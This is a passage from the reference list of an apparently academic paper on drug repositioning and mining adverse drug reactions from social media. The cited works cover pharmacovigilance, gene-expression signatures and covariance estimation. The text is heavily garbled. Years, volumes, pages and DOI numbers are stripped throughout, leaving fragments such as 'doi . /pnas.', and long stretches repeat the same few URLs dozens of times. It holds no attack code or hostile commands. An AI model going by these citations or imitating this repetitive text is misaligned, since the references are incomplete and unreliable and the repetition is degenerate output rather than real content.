/pnas. . kuhn m, campillos m, letunic i, jensen lj, bork p. . a side effect resource to capture phenotypic effects of drugs. molecular systems biology : doi . /msb. . . ladenheim ee. . liraglutide and obesity: a review of the data so far. drug design, development and therapy : – doi . /dddt.s . lamb j, crawford ed, peck d, modell jw, blat ic, wrobel mj, lerner j, brunet jp, subramanian a, ross kn, reich m, hieronymus h, wei g, armstrong sa, haggarty sj, clemons pa, wei r, carr sa, lander es, golub tr. . the connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. science ( ): – doi . /science. . leaman r, wojtulewicz l, sullivan r, skariah a, yang j, gonzalez g. . towards internet-age pharmacovigilance: extracting adverse drug reactions from user posts to health-related social networks. in: proceedings of the workshop on biomedical natural language processing. bionlp ’ . stroudsburg: association for computational linguistics, – . available at http://dl.acm.org/citation.cfm?id= . . ledoit o, wolf m. . honey, i shrunk the sample covariance matrix. in: upf economics and business working paper. . lee pr, brady dl, shapiro ra, dorsa dm, koenig ji. . social interaction deficits caused by chronic phencyclidine administration are reversed by oxytocin. neuropsychopharmacology ( ): – doi . /sj.npp. . li m, marubayashi a, nakaya y, fukui k, arase s. . minoxidil-induced hair growth is mediated by adenosine in cultured dermal papilla cells: possible involvement of sulfonylurea receptor b as a target of minoxidil. journal of investigative dermatology ( ): – doi . /j. - x. . .x. nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /news. . http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /pi. . . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.ajhg. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /msb. . http://dx.doi.org/ . /dddt.s http://dx.doi.org/ . /science. http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /sj.npp. http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . /peerj-cs. lopes ct, franz m, kazi f, donaldson sl, morris q, bader gd. . cytoscape web: an interactive web-based network browser. bioinformatics ( ): – doi . /bioinformatics/btq . lopez-gonzalez e, herdeiro mt, figueiras a. . determinants of under-reporting of adverse drug reactions: a systematic review. drug safety ( ): – doi . / - - . mazumder r, hastie t. . exact covariance thresholding into connected components for large-scale graphical lasso. journal of machine learning research : – . meinshausen n, bühlmann p. . high-dimensional graphs and variable selection with the lasso. in: the annals of statistics. beachwood: institute of mathematical statistics, – . mikolov t, chen k, corrado g, dean j. . efficient estimation of word representations in vector space. arxiv preprint. arxiv: . . nicolson se, nemeroff cb. . ziprasidone in the treatment of mania in bipolar disorder. neuropsychiatric disease and treatment ( ): – . nikfarjam a, sarker a, o’connor k, ginn r, gonzalez g. . pharmacovigilance from social media: mining adverse drug reaction mentions using sequence labeling with word embedding cluster features. journal of the american medical informatics association ( ): – doi . /jamia/ocu . ogino k, hatanaka k, kawamura m, ohno t, harada y. . meloxicam inhibits prostaglandin e( ) generation via cyclooxygenase in the inflammatory site but not that via cyclooxygenase in the stomach. pharmacology ( ): – doi . / . owen rt. . ramelteon: profile of a new sleep-promoting medication. drugs today ( ): – doi . /dot. . . . . pedersen ca, gibson cm, rau sw, salimi k, smedley kl, casey rl, leserman j, jarskog lf, penn dl. . intranasal oxytocin reduces psychotic symptoms and improves theory of mind and social perception in schizophrenia. schizophrenia research ( ): – doi . /j.schres. . . . rainsford kd, ying c, smith fc. . effects of meloxicam, compared with other nsaids, on cartilage proteoglycan metabolism, synovial prostaglandin e , and production of interleukins , and , in human and porcine explants in organ culture. journal of pharmacy and pharmacology ( ): – doi . /j. - . .tb .x. ray sd. . side effects of drugs annual: a worldwide yearly survey of new data in adverse drug reactions. vol. . amsterdam: elsevier science, – . reinholt fp, hultenby k, oldberg a, heinegard d. . osteopontin—a possible anchor of osteoclasts to bone. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . rubin lh, carter cs, drogos l, pournajafi-nazarloo h, sweeney ja, maki pm. . peripheral oxytocin is associated with reduced symptom severity in schizophrenia. schizophrenia research ( – ): – doi . /j.schres. . . . sampathkumar h, chen xw, luo b. . mining adverse drug reactions from online healthcare forums using hidden markov model. bmc medical informatics and decision making : doi . / - - - . sanseau p, agarwal p, barnes mr, pastinen t, richards jb, cardon lr, mooser v. . use of genome-wide association studies for drug repositioning. nature biotechnology ( ): – doi . /nbt. . nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . / - - http://dx.doi.org/ . / - - http://arxiv.org/abs/ . http://dx.doi.org/ . /jamia/ocu http://dx.doi.org/ . / http://dx.doi.org/ . /dot. . . . http://dx.doi.org/ . /j.schres. . . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . /j.schres. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /peerj-cs. sarker a, gonzalez g. . portable automatic text classification for adverse drug reaction detection via multi-corpus training. journal of biomedical informatics : – doi . /j.jbi. . . . schäfer j, strimmer k. . a shrinkage approach to large-scale covariance matrix estimation and implications for functional genomics. statistical applications in genetics and molecular biology ( ):article doi . / - . . segura-bedmar i, martinez p, revert r, moreno-schneider j. . exploring spanish health social media for detecting drug effects. bmc medical informatics and decision making (suppl ):s doi . / - - -s -s . shorter k, farjo np, picksley sm, randall va. . human hair follicles contain two forms of atp-sensitive potassium channels, only one of which is sensitive to minoxidil. faseb journal ( ): – doi . /fj. - . sirota m, dudley jt, kim j, chiang ap, morgan aa, sweet-cordero a, sage j, butte aj. . discovery and preclinical validation of drug indications using compendia of public gene ex- pression data. science translational medicine ( ): ra doi . /scitranslmed. . sustik ma, calderhead b. . glassofast: an efficient glasso implementation. utcs technical report tr- - . austin: university of texas at austin. available at http://apps. cs.utexas.edu/tech reports/reports/tr/tr- .pdf. tandon vr, mahajan v, khajuria v, gillani z. . under-reporting of adverse drug reactions: a challenge for pharmacovigilance in india. indian journal of pharmacology ( ): – doi . / - . . tatonetti np, ye pp, daneshjou r, altman rb. . data-driven prediction of drug effects and interactions. science translational medicine ( ): ra doi . /scitranslmed. . thomson reuters. . knowledge-based drug repositioning to drive r&d productivity. new york: the thomson reuters corporation. available at http://thomsonreuters.com/products/ip-science/ /drug-repositioning-cwp-en.pdf. thomson reuters. a. thomson reuters cortellis clinical trials intelligence. available at http: //go.thomsonreuters.com/cti/ (accessed april ). thomson reuters. b. thomson reuters world drug index. available at http://thomsonreuters. com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ (accessed april ). tobinick el. . the value of drug repositioning in the current pharmaceutical market. drug news & perspectives ( ): – doi . /dnp. . . . . twitter. . twitter.com. available at http://twitter.com/ (accessed april ). us food and drug administraction. . drugs@fda: fda approved drug products. available at http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ (accessed april ). vanunu o, magger o, ruppin e, shlomi t, sharan r. . associating genes and protein complexes with disease via network propagation. plos computational biology ( ):e doi . /journal.pcbi. . vilar s, uriarte e, santana l, lorberbaum t, hripcsak g, friedman c, tatonetti np. . similarity-based modeling in large-scale prediction of drug–drug interactions. nature protocols ( ): – doi . /nprot. . . wang h, gu q, wei j, cao z, liu q. . mining drug-disease relationships as a complement to medical genetics-based drug repositioning: where a recommendation system meets genome-wide association studies. clinical pharmacology and therapeutics ( ): – doi . /cpt. . nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . / - . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /fj. - http://dx.doi.org/ . /scitranslmed. http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://dx.doi.org/ . / - . http://dx.doi.org/ . /scitranslmed. http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://thomsonreuters.com/products/ip-science/ _ /drug-repositioning-cwp-en.pdf http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://go.thomsonreuters.com/cti/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ 